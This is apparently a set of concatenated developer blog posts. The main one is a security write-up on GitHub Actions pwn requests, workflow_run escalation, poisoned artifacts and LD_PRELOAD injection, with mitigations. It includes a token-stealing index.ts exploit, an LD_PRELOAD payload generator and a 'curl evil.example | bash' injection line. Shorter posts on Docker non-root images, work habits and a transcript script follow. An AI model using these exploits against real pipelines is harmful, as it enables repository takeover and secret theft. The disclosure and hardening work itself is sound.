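    - uses: actions/setup-node@v4
      with:
        node-version: ${{ inputs.node-version }}
    - run: npm ci && npm test
      shell: bash   # composite run steps must declare a shell explicitly
```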
Workflows are defined using YAML files located in a repository’s `.github/workflows` directory. Here is a basic example:
```
name: Base Workflow
on:
pull_request:
jobs:
whoami:
name: I'm base
runs-on: ubuntu-latest
steps:
- run: echo "I'm base"
```
Each workflow should include a `name` directive for reference, an `on` clause to specify triggers (such as the creation, modification, or closure of a pull request), and a `jobs` section that defines the jobs to be executed. Jobs run concurrently unless ordering is specified with the `needs` keyword.
Refer to the [official documentation](https://docs.github.com/en/actions) for more detailed information on GitHub Actions and how to create them.
### Authentication and secrets in GitHub Actions
GitHub Actions automatically generates a `GITHUB_TOKEN` secret at the start of each workflow. This token is used to authenticate the workflow and manage its permissions. The token’s permissions can be applied globally across all jobs in a workflow or configured separately for each job. The `GITHUB_TOKEN` is crucial as it allows users to modify repository contents directly or interact with the GitHub API to perform privileged actions.
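To make this concrete, here is an illustrative sketch of scoping the token: read-only by default at the workflow level, with a single job granted write access. The `gh` comment command is just one example of a privileged operation:

```yaml
permissions:
  contents: read        # default for every job in this workflow

jobs:
  comment:
    runs-on: ubuntu-latest
    permissions:
      issues: write     # only this job may comment on issues/PRs
    steps:
      - run: gh issue comment "$NUMBER" --body "Thanks!"
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          NUMBER: ${{ github.event.issue.number }}
```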
Additionally, GitHub Actions supports passing secrets to a job. Secrets are sensitive values defined in the project settings used for operations like authenticating to third-party services or accessing external APIs. If an attacker gains access to a secret, they could potentially extend the impact of an attack beyond GitHub Actions. Here's an example of a job using a secret:
```
name: Base Workflow
on:
pull_request:
jobs:
use-secret:
name: I'm using a secret
env:
MY_SECRET: ${{ secrets.MY_SECRET }}
runs-on: ubuntu-latest
steps:
- run: command --secret “$MY_SECRET”
```
As we’ve covered the basics, let’s dig deeper and see cases where misconfigured or outright vulnerable workflows can have security implications.
Vulnerable scenarios
--------------------
One particularly problematic feature in GitHub Actions is the handling of forked repositories. Forking allows developers to add features to repositories for which they lack write permissions by creating a copy of the repository, complete with its entire history, under the user's namespace. Developers can then work on this forked repository, create branches, push code changes, and eventually open a pull request back to the upstream repository (also known as the "base"). After an upstream maintainer reviews and approves the pull request (PR), the changes can be merged into the base repository.
In the context of a forked repository (referred to as "the context of the merge commit" in GitHub documentation), the user has complete control, and there are no restrictions on who can fork a repository. This creates a security boundary that GitHub is aware of. For example, the `pull_request` event is recommended for PRs originating from forks, as it doesn't have access to the base repository's context and secrets.
Conversely, the `pull_request_target` event has full access to the base repository’s context and secrets and often includes read/write permissions to the repository. Suppose this event does not validate inputs such as branch names, PR bodies, and artifacts originating from the fork. In that case, it can compromise the security boundary, potentially leading to hazardous effects on the workflow.
To help settle the confusion between the `pull_request_target` and `pull_request` triggers, here’s a table with the key differences:
| | `**pull\_request**` | `**pull\_request\_target**` |
| --- | --- | --- |
| Context of execution | forked repo | base repo |
| Secrets | ⛔ | ✅ |
| Default `GITHUB_TOKEN` permissions | READ | READ/WRITE |
### Pwn request
A "Pwn Request" scenario occurs when a workflow mishandles the `pull_request_target` trigger, potentially compromising the `GITHUB_TOKEN` and leaking secrets. Three specific conditions must be met for this issue to be exploitable:
**Workflow triggered by** `**pull\_request\_target**` **event**: The `pull_request_target` event runs in the context of the base of the pull request, not in the context of the merge commit, as the `pull_request` event does. This means that the workflow will execute the code in the context of the upstream repository, which a user of the forked repository should not have access to. Consequently, the `GITHUB_TOKEN` is typically granted write permissions. The `pull_request_target` event is intended to be used with safe upstream code, hence an additional condition is needed to break this boundary.
**Explicit checkout from the forked repository**:
```
- uses: actions/checkout@v2
with:
ref: ${{ github.event.pull_request.head.sha }}
```
Note: `github.event.pull_request.head.ref` is also a dangerous option. The ref clause points to the forked repository, and checking it out means the job will run code fully controlled by an attacker.
**Code execution or injection point**: This is where the damage occurs. Suppose an attacker has complete control over the checked-out code. In that case, they can replace any script that gets executed in subsequent steps with a malicious version, modify a configuration file with command execution potential (e.g., `package.json` used by `npm install`), or exploit a command injection vulnerability within a step to execute arbitrary code. The extent of the damage depends on how the permissions are configured and whether there are any secrets that can be leaked to compromise additional services. Since the `GITHUB_TOKEN`'s lifecycle is limited to the currently running workflow, an attacker must craft the exploit to run within that window.
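Putting the three conditions together, a vulnerable workflow might look like this (a hypothetical sketch, not taken from a real repository):

```yaml
name: Vulnerable CI
on:
  pull_request_target:              # condition 1: privileged trigger
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # condition 2: fork checkout
      - run: npm install            # condition 3: runs attacker-controlled package.json scripts
        env:
          SOME_SECRET: ${{ secrets.SOME_SECRET }}          # secret exposed to attacker code
```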
For a deep dive into how secrets can be leaked from GitHub Actions, refer to [Karim Rahal](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/)’s excellent write-up.
### workflow\_run privilege escalation
The `workflow_run` trigger in GitHub Actions is designed to run workflows sequentially rather than concurrently — starting one workflow after completing another. However, the subsequent workflow is executed with write permissions and access to secrets, even if the triggering workflow does not have such privileges. This creates a potential security risk similar to those previously discussed. How can an attacker exploit these elevated privileges?
**Control over the triggering workflow**: The triggering workflow must be completed successfully and controlled by the attacker. For instance, this workflow can be triggered by the `pull_request` event, which runs in the context of the merge (or forked) repository and is intended to run unsafe code.
**Workflow triggered with** `**workflow\_run**`: A subsequent workflow must be triggered by the `workflow_run` event and explicitly check out the unsafe code from the forked repository:
```
- uses: actions/checkout@v4
with:
repository: ${{ github.event.workflow_run.head_repository.full_name }}
ref: ${{ github.event.workflow_run.head_sha }}
fetch-depth: 0
```
Notice the `repository` and `ref` input variables pointing to the attacker-controlled code. This code is now granted elevated privileges for the `workflow_run` event, leading to privilege escalation.
**Code execution or injection point**: Similar to previous scenarios, an attacker needs a code execution or injection point in order to take over the triggered workflow.
### Unsafe artifact download
As we’ve seen in the case of `pull_request_target` and `workflow_run`, running workflows with read-write privileges to an upstream repo on untrusted code can be hazardous. According to official Github docs, it’s recommended to split the workflow into two: one that does unsafe operations, such as running build commands on a low-privileged workflow, and one that consumes the output artifacts and performs privileged operations, such as commenting on the PR. By itself, this is perfectly safe, but what happens if the privileged workflow uses the artifact unsafely?
Let’s take a look at the following example.
upload.yml:
```
name: Upload
on:
pull_request:
jobs:
test-and-upload:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Run tests
        run: npm install
- name: Store PR information
if: ${{ github.event_name == 'pull_request' }}
run: |
echo ${{ github.event.number }} > ./pr.txt
- name: Upload PR information
if: ${{ github.event_name == 'pull_request' }}
uses: actions/upload-artifact@v4
with:
name: pr
path: pr.txt
```
download.yml:
```
name: Download
on:
  workflow_run:
    workflows: ["Upload"]
    types: [completed]

jobs:
download:
runs-on: ubuntu-latest
if:
github.event.workflow_run.event == 'pull_request' &&
github.event.workflow_run.conclusion == 'success'
steps:
- uses: actions/download-artifact@v4
with:
name: pr
path: ./pr.txt
- name: Echo PR num
run: |
PR=$(cat ./pr.txt)
echo "PR_NO=${PR}" >> $GITHUB_ENV
```
An attacker can create a PR that replaces `package.json` with a crafted one to execute arbitrary code in the `npm install` step and trigger the upload workflow. They can add a `preinstall` script that sets `LD_PRELOAD` to replace the `pr.txt` file with a malicious one like `1\nLD_PRELOAD=[ATTACKER_SHARED_OBJ]`. When this file is read in the download workflow, the `LD_PRELOAD` payload will be injected into `GITHUB_ENV` in the echo command. If an attacker can also download a shared object, e.g., by downloading a second artifact they control, the entire privileged workflow can be compromised.
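As a sketch of the first step, a crafted `package.json` whose `preinstall` script writes the poisoned artifact might look like this (the `/tmp/evil.so` path is hypothetical):

```json
{
  "name": "innocent-looking-package",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "printf '1\\nLD_PRELOAD=/tmp/evil.so' > pr.txt"
  }
}
```

Note that in the upload workflow above, `pr.txt` is written after `npm install`, so a real exploit would need this write to win (for example via a background process), or the attacker could simply modify the later steps of `upload.yml` itself, since `pull_request` runs the fork's copy of the workflow.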
### Self-hosted runners
Github Actions provides hosted ephemeral runners to execute workflows. If a user wishes, they can set up a self-hosted runner over which they have full control. This doesn’t come without a price — if it gets compromised, an attacker can persist on the runner and infiltrate other workflows running on the same host and other hosts on the internal network. When these runners are configured in public repos, they increase the attack surface as they can execute code that doesn’t only originate from the repo maintainers and trusted developers. A detailed exploration of this vector can be found in [Adnan Khan’s blog](https://adnanthekhan.com/2023/12/20/one-supply-chain-attack-to-rule-them-all/comment-page-1/).
### Vulnerable actions
Actions are also a viable attack vector to compromise a workflow. Since Actions are hosted on Github, taking over one can trigger a supply-chain attack on all the workflows that depend on it. But one does not have to go that far — actions are just scripts often running directly on the runner host (and sometimes inside Docker containers). They receive data from the calling job through `inputs` and can access the global Github context and secrets. Essentially, whatever a calling workflow can do, a callee Action can also do it. If an Action contains a “classical” vulnerability, such as a command injection and an attacker that can trigger it with some input they control, they can take over the entire workflow.
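To make this concrete, here is a minimal hypothetical composite action with such a command injection (the action and input names are made up for illustration):

```
name: 'greet-pr'
inputs:
  title:
    description: 'PR title'
    required: true
runs:
  using: 'composite'
  steps:
    - run: echo "Processing ${{ inputs.title }}"
      shell: bash
```

Because `${{ inputs.title }}` is expanded textually before bash ever runs, a PR titled `"; curl https://evil.example/x.sh | bash; "` turns the echo into attacker-controlled shell code in the calling workflow's context.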
Exploit techniques
------------------
Once a vulnerable workflow is discovered, the next question is, can it be exploited with a meaningful impact? Here are a couple of techniques we’ve found useful:
**Code or command injection in a step**: When an attacker has control over the contents of a pull request, e.g., when a workflow triggers on `pull_request_target`, they can achieve arbitrary code execution in a handful of ways, including:
* Taking over a package manager install command — the most common example that comes to mind is adding a `preinstall` or `postinstall` script in a `package.json` file that will be executed in an `npm install` command. Of course, this is not limited to Node.js, as package managers have similar features in other ecosystems as well. For more examples, check out the [Living-Off-The-Pipeline](https://boostsecurityio.github.io/lotp/) page.
* Taking over an action hosted on the same repo — Actions can be hosted on any Github repo, including the one that contains the workflow. When the step’s `uses` clause starts with `./`, the code is contained in a subfolder within the repo. Replacing the `action.yml` file or one of the source files that will run, e.g., the `index.js` file in JavaScript, will run the code injected by the attacker.
**Using env var injection to set LD_PRELOAD**: Github already considers environment variable injection a threat, hence limiting the ones a user can set. For instance, additional CLI args can be provided to the `node` binary through the `NODE_OPTIONS` env var. If not restricted, an attacker could inject a payload into that env var, which would lead to command execution. As a result, Github prevents `NODE_OPTIONS` from being set in a workflow, as detailed [here](https://github.blog/changelog/2023-10-05-github-actions-node_options-is-now-restricted-from-github_env/). One env var that is not restricted is `LD_PRELOAD`. `LD_PRELOAD` points to a shared object loaded by the Linux dynamic linker into the process memory before all others. This allows function hooking, e.g., overwriting function calls with custom code, mainly used for instrumentation. By overwriting a function like `open()` or `write()` used in filesystem operations, an attacker can inject code that gets executed from the point of injection onward.
To illustrate some of these techniques, let's look at a real-world example.
### terraform-cdk-action Pwn request
The `terraform-cdk-action` repo contains an action created by Terraform. Compromising the Github Actions workflow of this kind of repo is particularly dangerous as modifications to the action can further compromise workflows depending on it.
The vulnerability exists in the `integration-tests.yml` workflow:
```
pull_request_target: << This triggers the workflow
types:
- opened
- ready_for_review
- reopened
- synchronize
...
integrations-tests:
needs: prepare-integration-tests
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
with:
ref: ${{ github.event.pull_request.head.ref }} << Unsafe checkout from fork
repository: ${{ github.event.pull_request.head.repo.full_name }}
...
- name: Install Dependencies
run: cd test-stacks && yarn install << This installs the attacker's 'package.json'
- name: Integration Test - Local
uses: ./ << This runs the local action, from within the PR
with:
workingDirectory: ./test-stacks
stackName: "test-stack"
mode: plan-only
githubToken: ${{ secrets.GITHUB_TOKEN }} << This token can be stolen
commentOnPr: false
- name: Integration Test - TFC
uses: ./ << This runs the local action, from within the PR
with:
workingDirectory: ./test-stacks
stackName: "test-stack"
mode: plan-only
terraformCloudToken: ${{ secrets.TF_API_TOKEN }} << This token can be stolen
githubToken: ${{ secrets.GITHUB_TOKEN }} << This token can be stolen
commentOnPr: false
```
This workflow is used to test the action within its own repo. Looking into the action.yml file, we can see that the `index.ts` (compiled to JavaScript) is the main file that gets executed:
```
name: terraform-cdk-action
description: The Terraform CDK GitHub Action allows you to run CDKTF as part of your CI/CD workflow.
runs:
using: node20
main: dist/index.js
```
The workflow references it in the `uses: ./` clause. Hence, all we need to do is modify it, and it’ll be executed. Here’s a look at the crafted `index.ts`:
```
import * as core from "@actions/core";
import { run } from "./action";
import { execSync } from 'child_process';
console.log("\r\nPwned action...");
console.log(execSync('id').toString());
const tfToken = Buffer.from(process.env.INPUT_TERRAFORMCLOUDTOKEN || ''.split("").reverse().join("-")).toString('base64');
const ghToken = Buffer.from(process.env.INPUT_GITHUBTOKEN || ''.split("").reverse().join("-")).toString('base64');
console.log('Testing token...');
const str = `# Merge PR
curl -X PUT \
https://api.github.com/repos/mousefluff/terraform-cdk-action/pulls/2/merge \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer ${process.env.INPUT_GITHUBTOKEN}" \
--header 'content-type: application/json' \
-d '{"commit_title":"pwned"}'`;
execSync(str, { stdio: 'inherit' });
run().catch((error) => {
core.setFailed(error.message);
});
```
We tested this on a copy of the original repo so as not to tamper with it. Since the `pull_request_target` trigger has write permissions to the base repo by default, and it wasn't restricted in any way, we were able to merge a PR with the compromised token successfully:

And we can see that the PR was successfully merged by the `github-actions[bot]`:

How to secure your pipelines
----------------------------
Securing Github Actions workflows depends on the implementation, and that can vary significantly. Different trigger scenarios require different safeguards. Let’s explore the various issues we’ve detailed and offer potential ways to mitigate them with some concrete examples for reference.
**Avoid running privileged workflows on untrusted code**: when using the `pull_request_target` or `workflow_run` triggers, do not checkout code from forked repos unless you have to, meaning `ref` shouldn't point to the likes of `github.event.pull_request.head.ref` or `github.event.workflow_run.head_sha`. Since these triggers run in the context of the base repo with read/write permissions granted to the `GITHUB_TOKEN` by default and access to secrets, compromising these workflows is especially dangerous.
If checking out the code is a must, here are some additional safety measures:
**Validate the triggering repo/user**: Add an if condition to the checkout step to limit the triggering party:
```
jobs:
validate_email:
permissions:
pull-requests: write
runs-on: ubuntu-latest
if: github.repository == 'llvm/llvm-project'
steps:
- name: Fetch LLVM sources
uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }}
```
Taken from [llvm/llvm-project](https://github.com/llvm/llvm-project/blob/8827ff92b96d78ef455157574061d745df2909af/.github/workflows/email-check.yaml#L16). Notice the `if` condition that checks if the triggering Github repo is the base repo, thus blocking PRs triggered by forks.
Here’s another example, this time checking that the user who created the PR is a trusted one:
```
jobs:
merge-dependabot-pr:
runs-on: ubuntu-latest
if: github.actor == 'dependabot[bot]'
steps:
- uses: actions/checkout@v4
with:
show-progress: false
ref: ${{ github.event.pull_request.head.sha }}
```
In [spring-projects/spring-security](https://github.com/spring-projects/spring-security/blob/89175dfed068bd22ce69f47e19fbcb7daefc6268/.github/workflows/merge-dependabot-pr.yml#L12-L12), `github.actor` is checked for Dependabot, thus blocking PRs originating from other users from running the job.
**Run the workflow only after manual validation**: This can be done by adding a label to the PR.
```
name: Benchmark
on:
pull_request_target:
types: [labeled]
jobs:
benchmark:
if: ${{ github.event.label.name == 'benchmark' }}
runs-on: ubuntu-latest
...
steps:
- uses: actions/checkout@v4
with:
persist-credentials: false
ref: ${{github.event.pull_request.head.sha}}
repository: ${{github.event.pull_request.head.repo.full_name}}
```
This example taken from [fastify/fastify](https://github.com/fastify/fastify/blob/af2ccb5ff681c1d0ac22eb7314c6fa803f73c873/.github/workflows/benchmark.yml#L9) shows a workflow triggered by a PR only when it’s labeled with “benchmark.” These if-condition statements can be applied both on the job and on a specific step level.
**Check that the triggering repo matches the base repo:** This is another way to restrict PRs originating from forked repos. For a workflow that triggers on `pull_request_target`, let’s look at the following `if` condition:
```
jobs:
deploy:
name: Build & Deploy
runs-on: ubuntu-latest
if: >
(github.event_name == 'pull_request_target' && contains(github.event.pull_request.labels.*.name, 'impact/docs'))
|| (github.event_name != 'pull_request' && github.event.pull_request.head.repo.full_name == github.repository)
```
As can be seen in [python-poetry/poetry](https://github.com/python-poetry/poetry/blob/108d7323280889b277751807fb7d564674fe6896/.github/workflows/docs.yaml#L23), notice the check that `github.event.pull_request.head.repo.full_name` coming from the PR event context matches the base repo `github.repository`.
Similarly, for a workflow that triggers on `workflow_run`, this will look like:
```
jobs:
publish-latest:
runs-on: ubuntu-latest
if: ${{ (github.event.workflow_run.conclusion == 'success') && (github.event.workflow_run.head_repository.full_name == github.repository) }}
```
As demonstrated in [TwiN/gatus](https://github.com/TwiN/gatus/blob/master/.github/workflows/publish-latest.yml#L13).
**Treat actions the same as you would 3rd-party dependencies**: Anyone familiar with the open source world and developer security hopefully knows by now the dangers of using packages stored in public code registries. Actions are the Github Actions’ dependency counterpart. If you’re using one, make sure to vet the repo that stores it. Once done, you can pin the action to a commit hash (a version tag is not good enough) to make sure that Github Actions will not pull a new version of it once it’s updated. This ensures that if the action gets compromised, you won’t suffer the consequences. An action can be pinned by using the `@` sign after the action’s name:
```
steps:
- uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
```
**Handling untrusted artifacts in Github Actions**: Artifacts generated by workflows running on untrusted code should be treated with the same caution as user-controlled code, as they can potentially serve as an entry point for attackers into a privileged workflow. To mitigate this risk, when downloading artifacts using the `github/download-artifact` action, always specify a `path` parameter. This ensures the contents are extracted to a designated directory, preventing any accidental overwriting of files in the job’s root directory that could later be executed in a privileged context. Additionally, developers should ensure that the contents of these artifacts are properly escaped and sanitized before being used in any sensitive operations. By taking these precautions, you can significantly reduce the risk of introducing vulnerabilities through untrusted artifacts.
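For the `pr.txt` example from earlier, a safer download step might look like this (a sketch; the directory name is arbitrary):

```
- uses: actions/download-artifact@v4
  with:
    name: pr
    path: ./artifacts
- name: Read PR number
  run: |
    PR="$(tr -cd '0-9' < ./artifacts/pr.txt)"
    echo "PR_NO=${PR}" >> "$GITHUB_ENV"
```

The dedicated `path` keeps the artifact out of the workspace root, and the `tr -cd '0-9'` filter strips anything that isn't a digit before the value reaches `GITHUB_ENV`.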
**Restrict the code that runs on self-hosted runners**: By default, PRs coming from forked repos need approval to execute workflows if the owner is a first-time contributor to the repo. If they’ve already contributed code, even just fixing a typo, the workflows will run automatically on their PRs. Obviously, this is an easy hurdle to clear, so the first recommendation is to change this setting to require approval for all external contributors:

There’s also a hardening tool by [step-security/harden-runner](https://github.com/step-security/harden-runner) designed to be the first step in any job in a workflow. A word of caution: hardening RCE-as-a-service solutions is not an easy task to accomplish, so using this might not be without risk.
**Adhering to the least privilege principle**: In the worst case, a workflow gets compromised, an attacker can run arbitrary code. Restricting the permissions of the `GITHUB_TOKEN` can be the last line of defense preventing an attacker from fully taking over a repo. This can be done globally in the repo’s settings, for each workflow, or even for jobs in the YAML config file. Special attention should be given to workflows that trigger on events like `pull_request_target` and `workflow_run` that have full read/write access to the base repo by default.
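In YAML, this can be as simple as declaring a restrictive default and widening it only where a specific job needs more (a sketch of the syntax, not taken from a specific repo):

```
permissions:
  contents: read

jobs:
  comment:
    runs-on: ubuntu-latest
    permissions:
      pull-requests: write
    steps:
      - run: echo "only this job can write PR comments"
```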
Community tool: Github Actions scanner
--------------------------------------
In order to scan issues in your Github Actions workflows and actions, we created a CLI tool — [Github Actions Scanner](https://github.com/snyk/github-actions-scanner). Given a Github repo or an org, it’ll parse all the YAML config files and use a regex-based rule engine to flag findings. It also has features that can facilitate exploitation:
**Auto creation of a copy of the target repo**: If an issue is found and requires additional validation or exploit development, we don’t want to do this on the target repo, to avoid affecting the actual code and risking exposure of the issue before it is responsibly disclosed and fixed. As a result, we can create a fresh copy of the repo on a Github user or org of choice to perform isolated testing.
**LD_PRELOAD payload generation**: When command injection is possible, using `LD_PRELOAD` to compromise subsequent steps is usually a great way to take over a workflow. Thus, we have created a proof-of-concept (POC) generator based on the following template:
```
const ldcode = Buffer.from(`#include <stdlib.h>
void __attribute__((constructor)) so_main() { unsetenv("LD_PRELOAD"); system("${command.replace("\"", "\\\"")}"); }
`)
const code = Buffer.from(`echo ${ldcode.toString("base64")} | base64 -d | cc -fPIC -shared -xc - -o $GITHUB_WORKSPACE/ldpreload-poc.so; echo "LD_PRELOAD=$GITHUB_WORKSPACE/ldpreload-poc.so" >> $GITHUB_ENV`)
```
It implements the following steps:
* Create a small Base64-encoded C program that invokes the `system` library call with a command specified by the user.
* Decode and compile it to a shared object in the `$GITHUB_WORKSPACE` root dir.
* Set `LD_PRELOAD` to the shared object and load it into the `GITHUB_ENV`.
Conclusion
----------
In this research, we provided an overview of Github Actions-related vulnerabilities and security hazards. Due to the multitude of options and the lack of clarity in the official documentation, developers are still getting these wrong, resulting in compromised CI/CD pipelines. Make no mistake, misconfigured and outright vulnerable workflows are not unique to Github Actions, and special care must be taken to secure them. As modern supply chain scanners and static analyzers can still fail to detect these issues, developers must adhere to safe best practices. We created an open source tool to help fill in the gaps and flag potential issues. As more research is done in this area, this blog and others can help focus and educate developers so that the occurrence of these bugs diminishes.
| snyk_sec |
1,879,775 | Use non-root user in scratch docker image | It's considered best practice to use non-root user in docker images, even if it's built from scratch... | 0 | 2024-06-07T02:00:05 | https://dev.to/hsatac/use-non-root-user-in-scratch-docker-image-1c0o | docker, security | ---
title: Use non-root user in scratch docker image
published: true
description:
tags: docker, security
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-06-07 01:54 +0000
---
It's considered best practice to use a non-root user in docker images, even when building from the scratch image.
But the scratch image is truly empty: you can't use commands like `useradd` to create a non-root user.
We can use [multi-stage builds](https://medium.com/@lizrice/non-privileged-containers-based-on-the-scratch-image-a80105d6d341) to achieve this.
```
FROM ubuntu:latest
RUN useradd -u 10001 scratchuser
FROM scratch
COPY dosomething /dosomething
COPY --from=0 /etc/passwd /etc/passwd
USER scratchuser
ENTRYPOINT ["/dosomething"]
```
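As a side note not covered in the original post: if you only need the process to run as non-root and don't care about the username resolving, a numeric `USER` works even without an `/etc/passwd` entry:

```
FROM scratch
COPY dosomething /dosomething
USER 10001
ENTRYPOINT ["/dosomething"]
```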
How can we verify it? We need the `id` command to check if the user is set correctly, and we can copy the needed binaries from `busybox`.
```
FROM busybox:1.35.0-uclibc AS busybox

FROM scratch
# ...the COPY/USER lines from the Dockerfile above...
COPY --from=busybox /bin/sh /bin/sh
COPY --from=busybox /bin/id /bin/id
```
And now we can use `docker exec` to run the `id` command and verify that it works.
| hsatac |
1,879,773 | 9 Habits of Highly Effective Programmers | As A Programmer the biggest improvement in my life came when I realized happiness is just a product... | 0 | 2024-06-07T01:49:01 | https://dev.to/healthydeveloper1/9-habits-of-highly-effective-programmers-5a27 | productivity, mentalhealth, developers, programmers | **As A Programmer the biggest improvement in my life came when I realized happiness is just a product of good habits.**
## Say No by Default
**say no to :**
- excessive overtime
- impossible deadlines
- unsolvable requirements
- unclear requirements
- unreasonable requirements
> "Your Mental Health Comes First"
## Get Addicted to Learning

Put time aside daily before bed to read.
At first, it was tough to stay consistent - but the more I did it, the more its effects compounded.
If you get in the habit of learning from programming books, your learning rate becomes faster by default.
## Prioritize Nature

A study of 20,000 people in the UK found that 120 minutes/week in nature improved health and well-being.
It's the planet's greatest healer.
> The Ultimate Solution for Fixing Bugs: nature
## Morning Routine
• No Computer first thing
• A small win early (e.g. light exercise)
• Mind primed for deep work (e.g. by journalling)
Your morning is the stretching before the sprint.
## Embrace Loneliness
Twice a month, I do something normally "social" alone.
I'll eat dinner, go to the park, or attend a movie by myself.
Solitude is an essential pillar to truly knowing yourself: it's the secret garden where self-discovery can bloom.
## Choose Writing Over Complaining

Complaining isn't attractive - it repels ambitious people and fosters a negative mindset.
Write down your thoughts instead: you're forced to think slowly and deeply so your irrationality loses its edge.
> Analyze them like you do with code .
## Pay it Forward
Random acts of kindness boost well-being:
• Holding the door for someone
• Picking up trash outside
• Giving a compliment
> The world's a closed system: if you send waves of positivity out, they'll find their way back to you.
## Maintain Relationships
Programmers Don't Have to be Socially Awkward.
So schedule time weekly for thoughtful texts and calls to those you've neglected.
It's a couple of minutes with an ROI you'll measure in years.
> "Don't Be like Eliot "

## Focus on Your Health
I’m convinced most mental health problems are actually physical health problems. Everyone I know who:
• Eats well
• Exercises daily
• Drinks enough water
is doing noticeably better mentally.
> Take care of yourself , You're not an AI
**Tech workers today are suffering from issues that no one talks about:**
• Burnout
• Anxiety
• Toxic workplaces
• Isolation
Geeks, [pick yourself up]( http://discordtree.com/view-4218).
| healthydeveloper1 |
1,879,772 | Questions to assess culture (fit) in tech | A list of questions to learn about team culture (fit) in tech | 0 | 2024-06-07T01:40:34 | https://dev.to/rvprasad/questions-to-identifyassess-culture-fit-in-tech-1d98 | work, culture, technology | ---
title: Questions to assess culture (fit) in tech
published: true
description: A list of questions to learn about team culture (fit) in tech
tags: Work, Culture, Technology
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-06-07 01:37 +0000
---
Based on my observations of teams, I compiled the following non-exhaustive list of questions to learn about the culture of a work environment.
1. Do teams have a list of well-defined values and behaviors that allow them to decide and execute mostly independently?
2. How does the work/development environment support prototyping and experimentation?
3. How long (or how much effort) does it take to go from idea to deploying a prototype or an alpha version to internal consumers (say, for continuous experimentation and development)?
4. Do teams conduct retrospectives? If so, for what scenarios and what happens after retrospectives? If not, why not?
5. How do teams ensure accountability for execution and outcomes? What about accountability for decisions? What about accountability for technical debt?
6. Would you deem your culture a permission culture or a constraint culture?
7. What is the basis of decisions in your teams, e.g., opinions, evidence, tenure of the executor, track record of the executor, or benefits from the effort?
8. What is the decision-making credo in your teams, e.g., skin in the game, no one is hurt, put up or shut up, where the buck stops?
9. What happens when team X needs feature Q in product P, which team Y owns but cannot build feature Q?
10. What is the reward/recognition culture, e.g., promo for having a significant impact or promo for executing long-term projects?
11. Were any projects shelved in the last 6–12 months? Why were the projects shelved? Who initiated the shelving?
12. Who identifies and initiates projects? What is the associated process?
13. During work hours, how much time do developers spend learning new knowledge that may not be immediately relevant to their current work?
There are no generally right or wrong answers to (all of) these questions. There are different degrees of goodness-of-fit between the provided answers and the expected answers to these questions.
Answering these questions can help employers and prospective employees assess whether they are a good fit.
To use these questions, prospective employees should identify the answers to these questions that align with their expectations of a reasonable work environment. Then, they can seek answers to these questions in interviews (remember the “do you have any questions for us?” question :)) or when researching employers.
Likewise, employers can adapt and adopt these questions in behavioral interviews to assess cultural fit. Before using them, employers should identify the answers that represent their work environment.
Teams and organizations can benefit from regularly revisiting such questions to assess the culture of their work environment.
Of course, the above questions will be useless without honest answers :)
Original post is available [here](https://medium.com/@rvprasad/questions-to-assess-culture-fit-in-tech-a7cfb2e94382).
| rvprasad |
1,879,771 | Transform Your Video Transcripts: From Raw to Readable Text | I cannot help but think of all the YouTube videos I have had to watch, simply because I didn't know... | 0 | 2024-06-07T01:34:35 | https://dev.to/roomals/transform-your-video-transcripts-from-raw-to-readable-text-15ep | python, ai, machinelearning, codenewbie | I cannot help but think of all the YouTube videos I have had to watch, simply because I didn't know how to save their transcripts. When I finally learned how, the resulting text was a mess. For instance, here’s a snippet from a required video for my biological psychology course:
```plaintext
Input: I've come here to California on the trail of one of the most infamous doctors of the with century Or Alter Freemen the last Alter Freemen began practicing as a doctor in the 1920s going on to work in one of the last institutions set up to house growing numbers of mentally ill people the Shell Shocked victims of the first world war and inmates with Dreadful psychiatric problems lived out their lives in what were known as snake pits psychiatric hospitals in the 1930s were terrible places to be as a patient and they were terrible places because they were they were places of hopelessness there were really no effective treatments for most mental disorders for the most part these hospitals warehouse patients for long periods of times decades even entire lives Freemen was horrified at the sheer waste of human potential now he started out with with good intentions and here was a terribly serious problem and it wasn't getting any better it was getting worse it was a public health problem Freemen was convinced that the root cause of many of the patients problems lay in the physical structure of their brains so he decided to change them a pulled by what he was seeing in these snake pits Freemen now spent increasing amounts of time in the laboratory coat brains dissecting brains examining brains looking for differences this is the brain received through the courtesy of Washington sanitary Freemen thought that surgery could help patients far more than the current treatments are cut off at the level of the middle of the pond spurred on by the growing understanding of what different regions of the brain do he finally decided that the problem lay in a set of connections between the thalamus and the frontal love the pointer demonstrates the thalamus and the anterior thalamic radiation going to all parts of the frontal L Freemen believed if he could never the connections between the thalamus and the frontal love and this would damper down all those awful emotions and it would 
if you like cure the patients he saw this as surgery of the Soul a way of bringing the Damned back to life but there was a problem Freemen was not himself a surgeon so he got together with a man who was James wants and together they started performing the operation action they called labotomy
[ Music ]
```
Not bad...
However, the lack of punctuation makes the experience less than desirable. So, to remedy this situation, I wove together a script that relies on YouTubeTranscriptApi and TextBlob, and imports the functionality of the punctuators module.
```python
from punctuators.models import PunctCapSegModelONNX
from textblob import TextBlob
from tqdm import tqdm
from typing import List
from youtube_transcript_api import YouTubeTranscriptApi
import nltk
import spacy
# Initialize models and download necessary resources
m = PunctCapSegModelONNX.from_pretrained("1-800-BAD-CODE/xlm-roberta_punctuation_fullstop_truecase")
nltk.download('punkt')
nlp = spacy.load("en_core_web_sm")
def nest_sentences(document: str, max_length: int = 1024) -> List[str]:
"""
Nest sentences into groups ensuring each group does not exceed max_length.
"""
nested, sent, length = [], [], 0
for sentence in nltk.sent_tokenize(document):
length += len(sentence)
if length < max_length:
sent.append(sentence)
else:
nested.append(" ".join(sent))
sent = [sentence]
length = len(sentence)
if sent:
nested.append(" ".join(sent))
return nested
def process_transcript(video_id: str) -> str:
"""
Retrieve and concatenate transcripts from YouTube video.
"""
transcript_list = YouTubeTranscriptApi.list_transcripts(video_id)
